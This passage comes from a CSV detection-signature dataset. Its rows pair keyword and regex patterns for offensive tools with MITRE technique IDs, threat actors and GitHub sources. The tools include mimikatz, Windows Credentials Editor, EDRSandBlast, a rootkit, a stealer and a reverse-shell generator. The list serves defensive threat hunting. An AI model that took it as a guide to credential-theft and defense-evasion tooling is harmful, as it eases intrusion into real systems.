analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.","T1210.001 - T1190 - T1589","TA0007 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/EnableSecurity/wafw00f","1","1","N/A","N/A","N/A","10","5606","966","2024-12-31T06:49:33Z","2014-05-14T17:08:16Z","62344" "*Waiting for rootkit response*",".{0,1000}Waiting\sfor\srootkit\sresponse.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","62345" "*waleedassar/SimpleNTSyscallFuzzer*",".{0,1000}waleedassar\/SimpleNTSyscallFuzzer.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - 
TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","N/A","7","2","145","25","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z","62346" "*Walledx765ets/Binanedx765ce*",".{0,1000}Walledx765ets\/Binanedx765ce.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","62347" "*Walledx765ets/Eleedx765ctrum*",".{0,1000}Walledx765ets\/Eleedx765ctrum.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","62348" "*Walledx765ets/Ethedx765ereum*",".{0,1000}Walledx765ets\/Ethedx765ereum.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","62349" 
"*WALLET=*.lolMinerWorker*",".{0,1000}WALLET\=.{0,1000}\.lolMinerWorker.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","62350" "*Wanetty inspired by @JoelGMSec*",".{0,1000}Wanetty\sinspired\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux #content","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","62351" "*wapiti -u*",".{0,1000}wapiti\s\-u.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62352" "*wapiti.git*",".{0,1000}wapiti\.git.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62353" "*wapiti.py*",".{0,1000}wapiti\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62354" "*wapiti3-*.tar.gz*",".{0,1000}wapiti3\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62355" "*wapiti3-*-any.whl*",".{0,1000}wapiti3\-.{0,1000}\-any\.whl.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62356" "*wapiti3/bin*",".{0,1000}wapiti3\/bin.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62357" "*wapiti-getcookie*",".{0,1000}wapiti\-getcookie.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62358" "*wappalyzer.py*",".{0,1000}wappalyzer\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62359" "*warberry*",".{0,1000}warberry.{0,1000}","offensive_tool_keyword","warberry","WarBerryPi is a RaspberryPi based hardware implant that has the ability to go on stealth mode when used in acquiring informational data from a target network. especially useful during red teaming engagements. It's designed with a special feature that allows it to get the needed information within the shortest time possible. 
WarBerryPis scripts are designed in such way to avoid noise in the network as much as possible.","T1589 - T1539 - T1562","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/secgroundzero/warberry","1","1","N/A","N/A","N/A","10","2223","289","2019-11-09T00:09:44Z","2016-05-10T16:25:03Z","62360" "*warpzoneclient.cpp*",".{0,1000}warpzoneclient\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62361" "*warpzoneclient.exe*",".{0,1000}warpzoneclient\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62362" "*warpzoneclient.exe*",".{0,1000}warpzoneclient\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62363" "*warpzoneclient.sln*",".{0,1000}warpzoneclient\.sln.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62364" "*warpzoneclient.vcxproj*",".{0,1000}warpzoneclient\.vcxproj.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62365" "*washingtonP1974/Rev-Shell*",".{0,1000}washingtonP1974\/Rev\-Shell.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","62366" "*Wat, this shouldn't happen? 
Orphaned message (somebody might be probing you!):*",".{0,1000}Wat,\sthis\sshouldn\'t\shappen\?\sOrphaned\smessage\s\(somebody\smight\sbe\sprobing\syou!\)\:.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","62367" "*WatermelonMakeup.azurewebsites.net*",".{0,1000}WatermelonMakeup\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","62368" "*wavestone-cdt/EDRSandblast*",".{0,1000}wavestone\-cdt\/EDRSandblast.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","62369" "*wavestone-cdt/Invoke-CleverSpray*",".{0,1000}wavestone\-cdt\/Invoke\-CleverSpray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","62370" 
"*wavvs/nanorobeus*",".{0,1000}wavvs\/nanorobeus.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","62371" "*WayneEvenson@protonmail.com*",".{0,1000}WayneEvenson\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62372" "*WayneEvenson@tutanota.com*",".{0,1000}WayneEvenson\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62373" "*waza1234*",".{0,1000}waza1234.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation default password","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 
- Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","62374" "*Waza1234/Waza1234/Waza1234/*",".{0,1000}Waza1234\/Waza1234\/Waza1234\/.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","62375" "*WazeHell/sam-the-admin*",".{0,1000}WazeHell\/sam\-the\-admin.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078.002 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","1","N/A","N/A","N/A","10","1012","193","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z","62376" "*WCE %s 
(Windows Credentials Editor)*",".{0,1000}WCE\s\%s\s\(Windows\sCredentials\sEditor\).{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","62381" "*wce -i 3e5 -s *",".{0,1000}wce\s\-i\s3e5\s\-s\s.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A","62382" "*WCE v1.0 (Windows Credentials Editor)*",".{0,1000}WCE\sv1\.0\s\(Windows\sCredentials\sEditor\).{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","62383" "*WCE v1.2 (Windows Credentials Editor)*",".{0,1000}WCE\sv1\.2\s\(Windows\sCredentials\sEditor\).{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","62384" "*wce*getlsasrvaddr.exe*",".{0,1000}wce.{0,1000}getlsasrvaddr\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - 
T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","62385" "*wce-master.zip*",".{0,1000}wce\-master\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","62386" "*wce-universal.exe*",".{0,1000}wce\-universal\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","62387" "*wcfrelayserver.py*",".{0,1000}wcfrelayserver\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","62388" "*wcfrelayserver.py*",".{0,1000}wcfrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","62389" "*WCMCredentials.txt*",".{0,1000}WCMCredentials\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62390" "*wdextract *:\*\*.vdm*",".{0,1000}wdextract\s.{0,1000}\:\\.{0,1000}\\.{0,1000}\.vdm.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","62391" "*wdextract *\mrt.exe*",".{0,1000}wdextract\s.{0,1000}\\mrt\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","62392" "*WDExtract-master*",".{0,1000}WDExtract\-master.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","62393" "*WDFilter has been successfully unloaded, use option 2 to disable Tamper Protection.*",".{0,1000}WDFilter\shas\sbeen\ssuccessfully\sunloaded,\suse\soption\s2\sto\sdisable\sTamper\sProtection\..{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","62394" "*wdigest!g_fParameter_UseLogonCredential*",".{0,1000}wdigest!g_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","62395" "*wdigest!g_IsCredGuardEnabled*",".{0,1000}wdigest!g_IsCredGuardEnabled.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common 
Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","62396" "*wdigest/decryptor.py*",".{0,1000}wdigest\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","62397" "*--wdigest-offsets *.csv *",".{0,1000}\-\-wdigest\-offsets\s.{0,1000}\.csv\s.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 